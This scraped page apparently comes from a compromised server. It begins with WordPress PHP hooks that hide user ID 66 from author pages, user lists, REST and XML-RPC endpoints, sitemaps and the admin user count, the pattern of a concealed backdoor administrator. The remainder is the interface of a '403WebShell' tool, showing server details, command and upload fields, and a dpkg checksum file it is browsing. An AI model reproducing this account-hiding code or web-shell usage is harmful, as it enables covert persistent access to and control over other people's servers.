add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/python3-distupgrade.md5sums
350c7c68e4c9c698f6df75614584c425  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeApport.py
54a6418f8392c23c806787f3221bf64e  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeCache.py
ac8eff6359f1f6ca252a676067a1c527  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeConfigParser.py
3169c565312cf2a0e67bf712eb901c64  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeController.py
a4b25dd95a59550eb3f7403cc2f6b561  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeFetcher.py
7f9e40a6e24ddc070b64634ae5bc0156  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeFetcherCore.py
5010600e3d218e93e1dbae31ef976640  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeFetcherKDE.py
4f3715139de84f2fb9650477b9e646ac  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeFetcherSelf.py
576f3850286380985ae9af8f02309397  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeGettext.py
efa755effe863ff4b26a6029b715b4f0  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeMain.py
7174b6c26176e3857a13c877043a7010  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradePatcher.py
eb32f71855482194b73c6ede79423fd7  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeQuirks.py
624551bad1e1384a0a452e80f50a2db9  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeVersion.py
e4f21d9b90d5961e6209160c8b83262a  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeView.py
2e7bbaedb5d701b03f4181cafd9991e7  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeViewGtk3.py
a7b351569b4955b61b92e9ed435f4816  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeViewKDE.py
101728ecc0d8a3fcef60215a24658d26  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeViewNonInteractive.py
01186227de51ef67da3d8c363a9be483  usr/lib/python3/dist-packages/DistUpgrade/DistUpgradeViewText.py
ed3c88750ba4561fd4e3687e1a03e986  usr/lib/python3/dist-packages/DistUpgrade/GtkProgress.py
fee80bd169efb58d04fa78824b0203ef  usr/lib/python3/dist-packages/DistUpgrade/MetaRelease.py
bbf3410d7445aa514f7d9b6cb3a8b013  usr/lib/python3/dist-packages/DistUpgrade/QUrlOpener.py
aba9335cad60556e35fe0ae0165e42a0  usr/lib/python3/dist-packages/DistUpgrade/ReleaseNotesViewer.py
84417ad12ec4913850959a2fcd7eca54  usr/lib/python3/dist-packages/DistUpgrade/ReleaseNotesViewerWebkit.py
8d668092701606a0faafdcb4f62839b8  usr/lib/python3/dist-packages/DistUpgrade/SimpleGtk3builderApp.py
67f21b3e901439cae5bd1bcf7f6c7e76  usr/lib/python3/dist-packages/DistUpgrade/SimpleGtkbuilderApp.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/DistUpgrade/__init__.py
9b3edbb3cfd0275a564f8243bd57b8d7  usr/lib/python3/dist-packages/DistUpgrade/apt_btrfs_snapshot.py
c3e48ff32a01cb7cd8d9c835707e898a  usr/lib/python3/dist-packages/DistUpgrade/apt_clone.py
d6fd62f25347d76a661c9f811e92f113  usr/lib/python3/dist-packages/DistUpgrade/dist-upgrade.py
e797beb7bfc8ca0f4d3fbbe7d646271b  usr/lib/python3/dist-packages/DistUpgrade/distro.py
7fd9a7b7f8e0b53dd6b06a64b7bdbe7a  usr/lib/python3/dist-packages/DistUpgrade/telemetry.py
99c7365ca6074dbd561ec27c680520d3  usr/lib/python3/dist-packages/DistUpgrade/utils.py
8274785740715a084f8a066f3671eaaf  usr/lib/python3/dist-packages/DistUpgrade/xorg_fix_proprietary.py
4c911bde8e1af5908f92ffad4229765f  usr/share/doc/python3-distupgrade/changelog.gz
b38c68d82f3fa513cdf9a1dfb9548ea1  usr/share/doc/python3-distupgrade/copyright

Youez - 2016 - github.com/yon3zu
LinuXploit